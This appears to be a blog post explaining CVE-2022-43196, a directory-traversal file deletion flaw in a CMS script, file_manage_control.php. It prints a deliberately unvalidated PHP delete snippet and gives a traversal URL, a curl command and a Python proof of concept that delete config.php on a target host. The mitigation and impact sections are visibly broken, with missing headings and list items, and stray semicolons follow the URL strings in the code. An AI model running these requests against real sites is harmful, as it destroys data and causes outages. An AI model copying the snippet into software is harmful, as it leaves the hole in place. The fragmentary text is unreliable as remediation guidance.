CVE-2022-43196 - Arbitrary File Deletion in dedecmdv6 v6.1.9 Explained

The world of Content Management Systems (CMS) is big, but so are the risks. With new vulnerabilities popping up every day, both users and administrators have to stay alert. One such threat is CVE-2022-43196, which hits the dedecmdv6 CMS, version 6.1.9. This post will break down what the bug is, how it works, and even walk through a proof-of-concept exploit, all in simple American language.

What is dedecmdv6?

dedecmdv6 is a popular Open Source CMS in Chinese-speaking communities. It's used to manage things like news sites, blogs, and company websites.

About the Vulnerability

CVE-2022-43196 is a critical vulnerability that lets an attacker *delete any file* on the server (arbitrary file deletion). The problem lives in file_manage_control.php. This flaw happens because the file doesn’t properly check or filter parameters when handling file deletion. That means a hacker can send a crafted request to the server and delete sensitive files.

Below is a simplified snippet inspired by the real problem in file_manage_control.php

// file_manage_control.php (simplified for clarity)
if ($_GET['action'] == 'delete') {
    $targetFile = $_GET['filename'];
    if (file_exists($targetFile)) {
        unlink($targetFile);
        echo "Deleted successfully.";
    } else {
        echo "File not found.";
    }
}

The problem here? The code takes the filename parameter straight from the user, with no validation, and deletes the file. This allows a hacker to delete ANY file on the server that the web server has permission to remove.

An attacker, usually after logging in (but sometimes even unauthenticated), visits the following URL

http://victim-site.com/file_manage_control.php?action=delete&filename=../../../../important_file.php

Here, filename is set to ../../../../important_file.php, which uses directory traversal (the ../ bits) to move up the directory tree and target files outside the intended folder.

Below is a simple way to test this exploit using curl

curl "http://victim-site.com/file_manage_control.php?action=delete&filename=../../../../config.php";

If the vulnerability exists, this will delete config.php if permissions allow.


Python PoC

import requests

target_url = 'http://victim-site.com/file_manage_control.php';
params = {
    'action': 'delete',
    'filename': '../../../../config.php'
}

r = requests.get(target_url, params=params)
print(r.text)

Denial of Service (DoS): Deleting key files can take the whole site offline.

- Further attacks: Removing certain files might weaken security, allowing more attacks like privilege escalation.

Set directory restrictions: Only allow deletion inside a defined upload directory.

3. Update dedecmdv6: Check for a patch or update from the dedecms.com website (Chinese).

References

- CVE-2022-43196 | NVD Entry
- dedecms.com Official Site
- Exploit Details - Github

Conclusion

CVE-2022-43196 in dedecmdv6 v6.1.9 is a classic yet dangerous example of what happens when user input is not properly checked. Server administrators should patch promptly, review file permissions, and always validate input in code.

Timeline

Published on: 11/23/2022 21:15:00 UTC
Last modified on: 11/28/2022 19:37:00 UTC